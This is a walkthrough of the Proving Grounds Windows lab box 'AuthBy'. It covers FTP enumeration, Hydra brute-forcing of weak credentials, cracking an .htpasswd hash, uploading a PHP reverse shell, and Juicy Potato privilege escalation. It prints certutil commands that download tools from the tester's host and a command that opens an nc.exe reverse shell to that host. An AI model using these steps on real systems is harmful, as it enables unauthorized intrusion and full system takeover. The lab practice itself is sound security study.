AuthBy

Source: Proving Grounds OS: Windows Community Rating: Hard

Enumeration & Reconnaissance

  • I started with the usual autorecon, which revealed the following open ports:

    • FTP (21)

    • HTTP (242)

    • 3145, 3389

  • FTP allowed anonymous login, so I began there. Although I could only list directories and not download files, I noticed an "accounts" folder containing usernames:

    • offsec

    • admin

    • anonymous

Accounts in FTP
  • The HTTP service, however, required credentials to proceed.

Gaining Initial Access

  • I used Hydra with the -e nsr flag to bruteforce the accounts. The admin account worked with the password "admin." While the admin credentials didn’t work on the HTTP site, they did grant access to FTP. Using the command: wget -r ftp://admin:admin@192.168.118.46

Admin Password Cracked
  • I downloaded the FTP files. After some digging and going in circles, I discovered a hidden file that I hadn't initially noticed, .htpasswd, which contained a hashed password for offsec. Running John against it, I cracked the hash, the password turned out to be "elite".

Initially Before Listing the Hidden Files and The Index Page
Offsec Encrypted Password
Offsec Password
  • Now with offsec credentials, I logged into the HTTP server and noticed that the index.html there was identical to the one on the FTP server. This indicated that I could upload a shell via FTP (using the admin account) and then access it on HTTP with the offsec account. I created a PHP shell, after trying pentestmonkey’s version, which would connect briefly then crash, I switched to Ivan Sincek’s PHP shell, and it finally worked. I was in.

Logged in Using Offsec
Getting a Reverse Shell

Privilege Escalation

  • Running whoami /priv revealed that I had the SeImpersonatePrivilege privilege.

  • I checked system info to determine whether the server was 64-bit or 32-bit and then downloaded several PoCs. None worked until I resorted to Juicy Potato. I used certutil to download the necessary files:

certutil -urlcache -split -f http://192.168.45.231:901/Juicy.Potato.x86.exe
certutil -urlcache -split -f http://192.168.45.231:901/nc.exe
  • After uploading both nc and Juicy Potato, I tried running Juicy Potato with the default CLSID—it didn’t work at first, so I tested with different ones until one succeeded:

.\Juicy.Potato.x86.exe -t * -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\wamp\bin\apache\Apache2.2.21\nc.exe -e cmd.exe 192.168.45.231 5555" -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
Default CLSID Failing
Getting SYSTEM

Lessons Learned

  • FTP Enumeration: Even with anonymous login, checking directories (like “accounts”) can reveal valid usernames.

  • Brute Force is Key: Using Hydra with the proper flags can uncover weak credentials quickly.

  • Hidden Files Matter: Don’t overlook hidden files on FTP servers—.htpasswd provided the offsec password here.

  • File Transfer Tools: Using wget -r to download all FTP files can save a lot of time.

  • Shell Stability: If one PHP shell doesn’t work (like pentestmonkey’s), try alternatives until you get a stable connection.

  • Windows Nuances: Remember that on Windows, commands are executed with .\ rather than ./, and rlwrap can improve shell usability with nc.

  • Certutil for File Uploads: Certutil is a useful tool for transferring files, as demonstrated when downloading Juicy Potato and nc.

  • Privilege Escalation with Juicy Potato: Leveraging SeImpersonate privileges through Juicy Potato can be a gate for Windows privilege escalation.

Last updated